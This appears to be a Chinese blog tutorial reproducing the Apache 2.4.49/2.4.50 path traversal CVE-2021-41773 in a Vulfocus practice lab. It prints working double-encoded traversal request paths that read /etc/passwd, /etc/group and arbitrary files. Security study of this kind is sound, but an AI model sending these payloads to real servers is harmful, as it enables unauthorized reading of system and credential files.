-
中间件安全:Apache 目录穿透.(CVE-2021-41773)
中间件安全:Apache 目录穿透.(CVE-2021-41773)
Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
目录:
中间件安全:Apache 目录穿透.(CVE-2021-41773)
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客
第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )
第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.
Apache 目录穿透:
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客
漏洞测试:
第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )
第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.
- # 查找存储用户账户信息,包括用户名和用户 ID
- /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
- # 查找存储组信息,包括组名和组成员
- /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group
- # 如果需要查看别的目录信息,则替换后面的就行.
- /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径
学习链接:第59天:服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili
-
相关阅读:
9_Vue事件修饰符
时间模块之datatime模块、os模块、sys模块、json模块、json模块实操
数据结构题目收录(三)
Livox SLAM(带LIO+闭环检测优化)
输入一组学生信息并保存到文件中。学生信息包括学号,姓名,5门课的分数。 要求使用结构体数组做函数参数编程。
Win10系统电脑没有键盘怎么启用软键盘
Socket编程
springboot+vue开发的视频弹幕网站动漫网站
数据不平衡GPT调研
Hopcroft–Karp algorithm
- 原文地址:https://blog.csdn.net/weixin_54977781/article/details/134494625